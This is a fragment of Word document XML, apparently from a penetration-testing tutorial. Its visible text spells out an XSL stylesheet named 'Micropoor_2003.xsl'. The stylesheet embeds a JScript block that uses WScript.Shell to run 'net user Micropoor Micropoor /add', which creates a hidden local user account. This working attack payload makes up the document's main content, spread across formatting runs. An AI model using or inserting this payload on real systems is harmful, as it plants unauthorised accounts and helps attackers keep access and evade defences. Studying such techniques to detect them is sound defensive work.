    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oor_2003.xsl:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371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?xml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'1.0'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?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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="98"/>
        </w:rPr>
        <w:t> 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stylesheet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="12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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="9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xmlns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"http://www.w3.org/1999/XSL/Transform"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10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xmlns:ms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"urn:schemas‐mic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roso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ft‐com:xslt"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="93"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xmlns:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>user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"placeholder"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3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="91"/>
        </w:rPr>
        <w:t> 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version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"1.0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="3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6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96c38"/>
          <w:spacing w:val="7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output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> 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method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7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"text"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/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7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&lt;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ms:script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implements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pacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>prefix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"user"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0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"JScript"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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="8753" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> 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15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CDATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="51" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1339" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4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var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7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=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new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ActiveXObject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"WScript.Shell"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="13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pacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(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"net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6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Micropoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Mic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659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ropoor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659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/add"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="122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-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> 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989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]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9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="8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9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8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ms:script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="90"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>stylesheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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0" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="9599" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Micr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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